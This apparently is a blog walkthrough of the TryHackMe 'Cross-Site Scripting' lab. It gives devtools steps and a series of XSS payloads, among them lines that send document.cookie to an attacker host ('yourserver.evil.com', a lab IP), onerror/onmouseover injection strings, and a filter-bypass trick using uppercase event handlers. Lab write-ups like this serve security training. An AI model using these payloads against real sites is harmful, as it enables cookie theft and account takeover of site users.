TryHackMe: Cross-Site Scripting

<a href=”www.google.com”> Click on this link </a>
<script>alert(document.cookie)</script>
  1. To do this, we need to find out the HTML tag associated with the title “XSS Playground”.
  2. Open your “Web Console” → Click on “Inspector” → Click on the “XSS Playground” in the browser.
  3. Under “Inspector”, you should see a highlighted section → Search for “XSS Background” → You should see that “XSS Playground” is assigned to <span id = “thm-title”>.
  4. Go to the “Web Console” → Click on “Console” → Run this JavaScript: document.querySelector(‘#thm-title’).textContent = “I am a hacker”.
  5. The JavaScript seems to be working → Now, go to the comment section and add your script → <script> document.querySelector(‘#thm-title’).textContent = ‘I am a hacker’ </script>.
<script> document.querySelector('#thm-title').textContent = 'I am a hacker' </script>
document.write(‘<img src=”https://yourserver.evil.com/collect.gif?cookie=' + document.cookie + ‘“ />’)
<script>document.location='http://10.10.88.170/log'+document.cookie</script>
<script>alert("Hello")</script>
<script>alert(window.location.hostname)</script>
  1. Type “asasas” into the search box.
  2. Go to your “Web Console” → Click on the “Network” section → Search for “asasas” and its associated page.
  3. You can see that the search is associated with http://10.10.234.78/dom page.
  4. Now, click on the “Debugger” section → Search for /dom page → Look for the script associated with “Image not found..”.
  5. You can see that the associated script is using <img src=>.
test" onmouseover="alert(document.cookie)" ORtest" onerror="alert(document.cookie)"
test" onmousehover="document.body.style.backgroundColor = 'red'"
<img src="x" onerror="alert('Hello')">
<img src="x" onerror="prompt('Hello')">
<img src="x" onerror="alert('HHelloello')">
  • word “Hello”
  • script
  • onerror
  • onsubmit
  • onload
  • onmouseover
  • onfocus
  • onmouseout
  • onkeypress
  • onchange
<img src="x" ONERROR="alert('HHelloello')">

--

--

--

A food lover, a cyber security enthusiast, a musician and a traveller, so you will see a mix of different contents in my blog. ☺️

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Wireshark investigation: Wireshark Strikes Back

500,000 Zoom Passwords Leaked: The Time Is Now To Secure Your App with Debrief’s Middleware

Can You Text Someone After You Block Their Number?

Does Avast Antivirus Work For Mac

Balancing Admin Rights & Control — Privilege Access Management

Knowing your data flows is critical for cyber security

🫐 Arctic-HTB ✅

The chronic condition of formetitis (filling forms)

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
goay xuan hui

goay xuan hui

A food lover, a cyber security enthusiast, a musician and a traveller, so you will see a mix of different contents in my blog. ☺️

More from Medium

TryHackMe: Wreath

Mr. Robot (MEDIUM)— THM

HackTheBOX TOXIC Writeup.

Undiscovered | TryHackMe